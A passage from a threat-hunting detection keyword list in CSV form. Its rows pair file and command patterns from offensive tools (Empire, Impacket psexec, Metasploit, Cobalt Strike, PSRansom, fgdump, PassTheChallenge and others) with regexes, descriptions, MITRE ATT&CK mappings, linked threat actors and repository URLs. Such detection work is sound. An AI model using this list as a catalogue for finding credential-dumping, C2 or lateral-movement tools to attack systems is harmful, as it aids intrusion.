T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 
- TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","55687" "*ps-empire*",".{0,1000}ps\-empire.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","55688" "*psexec.py*",".{0,1000}psexec\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","55691" "*psexec_ms17_010.rb*",".{0,1000}psexec_ms17_010\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","55693" "*PSEXEC_PSH *",".{0,1000}PSEXEC_PSH\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch 
- TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/vysecurity/ANGRYPUPPY","1","0","N/A","N/A","10","10","316","87","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z","55694" "*-PsExecCmd*",".{0,1000}\-PsExecCmd.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-PsExec.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","55696" "*PsExecLiveImplant*",".{0,1000}PsExecLiveImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","55697" "*PsExecMenu(*",".{0,1000}PsExecMenu\(.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","55698" "*PSExecSVC remote orchestrator*",".{0,1000}PSExecSVC\sremote\sorchestrator.{0,1000}","offensive_tool_keyword","susinternals","python implementation of PSExec native service implementation","T1569.002 - T1021.002 - T1035","TA0002 
- TA0004 - TA0008 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/susinternals","1","0","#content","N/A","7","2","194","18","2025-02-11T09:34:50Z","2025-02-10T07:40:36Z","55699" "*pseymour/MakeMeAdmin*",".{0,1000}pseymour\/MakeMeAdmin.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","1","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","55702" "*psinject * x64 Invoke-*",".{0,1000}psinject\s.{0,1000}\sx64\sInvoke\-.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55704" "*psinject -PID*",".{0,1000}psinject\s\-PID.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","55705" 
"*PSInvoke_BloodHound*",".{0,1000}PSInvoke_BloodHound.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","55706" "*PSLessExec.exe *",".{0,1000}PSLessExec\.exe\s.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","55707" "*pslo *.ps1*",".{0,1000}pslo\s.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - 
T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","55708" "*PsMapExec -*",".{0,1000}PsMapExec\s\-.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","55711" "*PsMapExec will continue in the current users context*",".{0,1000}PsMapExec\swill\scontinue\sin\sthe\scurrent\susers\scontext.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","55712" "*PsMapExec.ps1*",".{0,1000}PsMapExec\.ps1.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","1","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","55713" "*PsMapExec-main*",".{0,1000}PsMapExec\-main.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","1","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","55714" "*pSNIRFgTuZnCdHN*",".{0,1000}pSNIRFgTuZnCdHN.{0,1000}","offensive_tool_keyword","trevorc2","Command and Control via Legitimate Behavior over HTTP","T1105 - T1071 - T1070","TA0011","N/A","N/A","C2","https://github.com/trustedsec/trevorc2","1","0","N/A","N/A","10","10","1271","271","2022-01-31T20:16:24Z","2017-10-27T15:59:28Z","55715" "*Pspersist-main*",".{0,1000}Pspersist\-main.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","1","N/A","N/A","10","1","85","24","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z","55716" "*PSprofile.cpp*",".{0,1000}PSprofile\.cpp.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ 
that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","0","N/A","N/A","10","1","85","24","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z","55717" "*pspy - version: *",".{0,1000}pspy\s\-\sversion\:\s.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","8","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","55718" "*pspy*psscanner",".{0,1000}pspy.{0,1000}psscanner","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","6","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","55719" "*pspy32 -*",".{0,1000}pspy32\s\-.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","6","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","55720" "*pspy64 -*",".{0,1000}pspy64\s\-.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","6","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","55721" "*pspy64 -p*",".{0,1000}pspy64\s\-p.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - 
T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","8","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","55722" "*pspy64 -r *",".{0,1000}pspy64\s\-r\s.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","8","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","55723" "*pspy-build:latest*",".{0,1000}pspy\-build\:latest.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","6","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","55724" "*pspy-development:latest*",".{0,1000}pspy\-development\:latest.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","6","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","55725" "*pspy-example:latest*",".{0,1000}pspy\-example\:latest.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","6","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","55726" "*pspy-master*",".{0,1000}pspy\-master.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","#linux","N/A","6","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","55727" 
"*pspy-testing:latest*",".{0,1000}pspy\-testing\:latest.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","6","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","55728" "*PSRansom by @JoelGMSec*",".{0,1000}PSRansom\sby\s\@JoelGMSec.{0,1000}","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","0","N/A","N/A","9","5","478","116","2024-01-19T09:50:26Z","2022-02-27T11:52:03Z","55729" "*PSRansom.ps1*",".{0,1000}PSRansom\.ps1.{0,1000}","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","1","N/A","N/A","9","5","478","116","2024-01-19T09:50:26Z","2022-02-27T11:52:03Z","55730" "*PSRecon.ps1*",".{0,1000}PSRecon.{0,1000}","offensive_tool_keyword","PSRecon","PSRecon gathers data from a remote Windows host using PowerShell (v2 or later). organizes the data into folders. hashes all extracted data. hashes PowerShell and various system properties. and sends the data off to the security team. The data can be pushed to a share. sent over email. 
or retained locally.","T1059 - T1003 - T1556 - T1204","TA0002 - TA0009","N/A","N/A","Discovery","https://github.com/gfoss/PSRecon","1","1","N/A","N/A","9","5","486","105","2017-07-29T15:03:04Z","2015-08-03T05:43:38Z","55731" "*psreflect *",".{0,1000}psreflect\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","55732" "*PSRunspace-InvokeRun-certutilCoded.txt*",".{0,1000}PSRunspace\-InvokeRun\-certutilCoded\.txt.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","55733" "*pstgdump.exe*",".{0,1000}pstgdump\.exe.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","55734" 
"*PstPassword.exe*",".{0,1000}PstPassword\.exe.{0,1000}","offensive_tool_keyword","PstPassword","recover the PST passwords of Outlook","T1212","TA0006","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/pst_password.html","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","55735" "*pstpassword.zip*",".{0,1000}pstpassword\.zip.{0,1000}","offensive_tool_keyword","PstPassword","recover the PST passwords of Outlook","T1212","TA0006","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/pst_password.html","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","55736" "*pstpassword_setup.exe*",".{0,1000}pstpassword_setup\.exe.{0,1000}","offensive_tool_keyword","PstPassword","recover the PST passwords of Outlook","T1212","TA0006","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/pst_password.html","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","55737" "*pstree.ps1*",".{0,1000}pstree\.ps1.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","55738" "*PtC.exe challenge*",".{0,1000}PtC\.exe\schallenge.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","N/A","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","55745" "*PtC.exe compare*",".{0,1000}PtC\.exe\scompare.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/ly4k/PassTheChallenge","1","0","N/A","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","55746" "*PtC.exe inject*",".{0,1000}PtC\.exe\sinject.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","N/A","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","55747" "*PtC.exe nthash *",".{0,1000}PtC\.exe\snthash\s.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","N/A","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","55748" "*PtC.exe ping*",".{0,1000}PtC\.exe\sping.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","N/A","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","55749" "*PtC.exe protect*",".{0,1000}PtC\.exe\sprotect.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation 